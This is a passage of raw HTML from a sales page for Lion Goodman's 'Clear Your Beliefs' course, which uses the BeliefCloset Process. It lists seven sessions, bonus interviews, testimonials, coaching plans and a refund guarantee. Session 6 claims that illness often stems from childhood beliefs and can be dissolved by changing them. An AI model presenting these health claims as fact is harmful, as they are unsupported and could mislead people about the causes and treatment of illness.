src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships. If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?\r\n\r\nHumans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\r\n\r\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way. We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.<em> </em>(She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">Optional: Professional Coaching Sessions</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>You can easily take this journey on your own, one recorded session at a time.  You also have the option of adding personalized support from a <em>Clear Your Beliefs Coach</em> – a qualified professional who will accompany you on your journey and guide you, step-by-step, through the process.\r\n\r\nOur outstanding coaches are trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\r\n\r\n<em>Clear Your Beliefs Coaches</em> are located throughout the United States and Canada, and worldwide, from Europe to Australia, and South Africa to Scandinavia. Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\r\n\r\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\r\n\r\nTake advantage of this up-close-and-personal support during the program.  Support sessions are optional, and are provided at an additional cost.  <strong>Choose the plan that suits you best - from the recorded program-only, to full support each week.</strong>\r\n\r\n&nbsp;\r\n<div class="icon_box" style="width: 760px; margin: 17px 0 17px -70px;">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home.  Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\r\n<h1>Plus: <em>The Entire BONUS Collection:</em></h1>\r\n<ul>\r\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\r\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\r\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="s20">Praise for Lion and Clear Your 